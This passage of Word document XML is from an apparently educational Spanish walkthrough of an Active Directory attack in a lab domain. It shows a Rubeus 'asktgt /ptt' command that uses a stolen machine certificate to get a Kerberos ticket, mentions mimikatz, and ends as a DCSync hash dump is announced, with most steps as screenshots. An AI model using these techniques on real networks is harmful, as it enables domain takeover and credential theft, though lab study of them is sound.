                      <w:r w:rsidR="00316CB3">
                        <w:t>d</w:t>
                      </w:r>
                      <w:r w:rsidRPr="001B29B0">
                        <w:t>ministrador -p abc123. 192.168.1.79</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="328788F2" w14:textId="62AF1AC3" w:rsidR="00737140" w:rsidRDefault="00737140">
                      <w:r>
                        <w:t>Indicando nombre de usuario, contraseña y la IP de la máquina a la que nos vamos a conectar.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="259EB856" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DAA73F" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="331BD368" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B64AE7B" w14:textId="77777777" w:rsidR="00603A68" w:rsidRDefault="00603A68" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B04D54" w14:textId="77777777" w:rsidR="001D590F" w:rsidRDefault="001D590F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D90586" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E9A366" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F75484" w14:textId="4B29DFDD" w:rsidR="00737140" w:rsidRDefault="001B29B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207DF415" wp14:editId="390737D8">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1771400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0622" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"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742D12F9" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7073A495" w14:textId="4EC228A7" w:rsidR="00871597" w:rsidRDefault="00871597" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AE266AA" w14:textId="34859533" w:rsidR="00871597" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03B9A417" wp14:editId="1E2455E2">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1186974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4374" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"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4C4BAFE7" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9CA6B3" w14:textId="130BB980" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Entrando en la máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4F373F" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C821F2D" w14:textId="49D0AAFD" w:rsidR="00737140" w:rsidRDefault="001B29B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Creare una carpeta WindowsServer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D00D2A3" w14:textId="77777777" w:rsidR="001B29B0" w:rsidRDefault="001B29B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518D1855" w14:textId="41019012" w:rsidR="001B29B0" w:rsidRDefault="001B29B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7400E478" wp14:editId="04D22A2A">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1910669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9797" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167"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20436B42" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0A2F7D" w14:textId="02D8D0DC" w:rsidR="001B29B0" w:rsidRDefault="001B29B0" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En ella descargaré </w:t>
      </w:r>
      <w:r w:rsidR="000F35DB">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>ubeus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1020AF84" w14:textId="77777777" w:rsidR="001D590F" w:rsidRDefault="001D590F" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274CA154" w14:textId="77777777" w:rsidR="001D590F" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AC15DB0" wp14:editId="4D60C232">
            <wp:extent cx="5400040" cy="2006600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60848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954" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9CD64" w14:textId="77777777" w:rsidR="00386103" w:rsidRDefault="00386103" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DFC69BF" w14:textId="26EB2DE6" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y guardaré el certificado antes obtenido:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685AFD5" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C8769C" w14:textId="45365012" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FAAA6CB" wp14:editId="20BDE1C6">
            <wp:extent cx="5400040" cy="2776220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1312300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00505" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169" cstate="screen">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0C17768B" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D359922" w14:textId="77D92214" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearé un servidor http en esta carpeta para poder descargar estos dos archivos en el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E54313A" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1569A1D3" w14:textId="4BE65BF8" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F63158E" wp14:editId="31B142EE">
            <wp:extent cx="5400040" cy="1128395"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1734705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05768" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId170" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1128395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB67581" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B119AA" w14:textId="0E802ECC" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora en el servidor los descargaremos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5D0140" w14:textId="77777777" w:rsidR="004972A7" w:rsidRDefault="004972A7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEE3E7C" w14:textId="63726081" w:rsidR="004972A7" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo el certificado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A3C55" w14:textId="77777777" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E501EB3" w14:textId="40600CF5" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FDDE81F" wp14:editId="3DC34653">
            <wp:extent cx="5400040" cy="1833880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="736583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3482" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId171" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1833880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715DE80" w14:textId="77777777" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E6B046" w14:textId="6FD75CD3" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Y ahora descarg</w:t>
      </w:r>
      <w:r w:rsidR="00C25D27">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F35DB">
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>ubeus</w:t>
      </w:r>
      <w:r w:rsidR="00C25D27">
        <w:t xml:space="preserve"> em el servidor mediante el servidor web que cree</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00C25D27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BC415" w14:textId="77777777" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2853CEC4" w14:textId="4FD2AEA6" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6082E9B3" wp14:editId="43A904C4">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="881647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7786" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId172"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236EDA8E" w14:textId="77777777" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1A9ED1" w14:textId="77777777" w:rsidR="006B541E" w:rsidRDefault="0062673C" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="554CA550" wp14:editId="786EDE60">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="20958026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263BAE52" w14:textId="7D71F040" w:rsidR="0062673C" w:rsidRDefault="0062673C">
                            <w:r w:rsidRPr="0062673C">
                              <w:t>.\Rubeus.exe asktgt /USER:WIN-4KNTOU4M948$ /ptt /dc:192.168.1.</w:t>
                            </w:r>
                            <w:r w:rsidR="006B541E">
                              <w:t>80</w:t>
                            </w:r>
                            <w:r w:rsidRPr="0062673C">
                              <w:t xml:space="preserve"> /domain:google.local /certificate:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1AF5E3EF" w14:textId="77777777" w:rsidR="0062673C" w:rsidRDefault="0062673C"/>
                          <w:p w14:paraId="487FAFCE" w14:textId="77777777" w:rsidR="0062673C" w:rsidRDefault="0062673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4CA550" id="_x0000_s1049" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517340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263BAE52" w14:textId="7D71F040" w:rsidR="0062673C" w:rsidRDefault="0062673C">
                      <w:r w:rsidRPr="0062673C">
                        <w:t>.\Rubeus.exe asktgt /USER:WIN-4KNTOU4M948$ /ptt /dc:192.168.1.</w:t>
                      </w:r>
                      <w:r w:rsidR="006B541E">
                        <w:t>80</w:t>
                      </w:r>
                      <w:r w:rsidRPr="0062673C">
                        <w:t xml:space="preserve"> /domain:google.local /certificate:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1AF5E3EF" w14:textId="77777777" w:rsidR="0062673C" w:rsidRDefault="0062673C"/>
                    <w:p w14:paraId="487FAFCE" w14:textId="77777777" w:rsidR="0062673C" w:rsidRDefault="0062673C"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FC1D9B">
        <w:t xml:space="preserve">Y lo ejecuto desde </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433C77D" w14:textId="41BC411C" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3CFCD4" w14:textId="77777777" w:rsidR="006B541E" w:rsidRDefault="006B541E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5891B904" w14:textId="77777777" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B70F14E" w14:textId="0A5CD315" w:rsidR="00FC1D9B" w:rsidRDefault="00FC1D9B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="261A8B7F" wp14:editId="1575A9FE">
            <wp:extent cx="5400040" cy="2638425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1578826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26405" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId173" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2638425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="183DCBF2" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E03FFB6" w14:textId="1D7BF9F9" w:rsidR="00737140" w:rsidRDefault="006B541E" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38317E54" wp14:editId="69F2F524">
            <wp:extent cx="5400040" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="190901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7641" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId174" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1592580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745AED0" w14:textId="77777777" w:rsidR="00737140" w:rsidRDefault="00737140" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="714213D8" w14:textId="7C137278" w:rsidR="00737140" w:rsidRDefault="009412B5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354615F1" w14:textId="77777777" w:rsidR="009412B5" w:rsidRDefault="009412B5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1CF13F" w14:textId="3C0D9252" w:rsidR="009412B5" w:rsidRDefault="009412B5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FB31BB8" wp14:editId="3EF1009D">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="638981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1527" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId175"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39E67754" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C09334A" w14:textId="2779CAE8" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Obteniendo el ticket de Kerberos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C03AE7" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2771A687" w14:textId="3A2A7D45" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B148108" wp14:editId="5ED3C9D1">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1949634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4917" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55937DEA" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="500647D4" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaremos mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE428B" w14:textId="77777777" w:rsidR="003151C5" w:rsidRDefault="003151C5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F9B05F" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBB8022" wp14:editId="16C8A954">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1581531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31108" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177"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6ADCF49B" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598BF99E" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora podremos ejecutar un ataque de DCSync para recuperar todos los hashes del dominio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754618D" w14:textId="77777777" w:rsidR="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="003151C5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD42BFE" w14:textId="7780B8C0" w:rsidR="00DE12E5" w:rsidRPr="00DE12E5" w:rsidRDefault="00DE12E5" w:rsidP="00DE12E5">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE12E5">
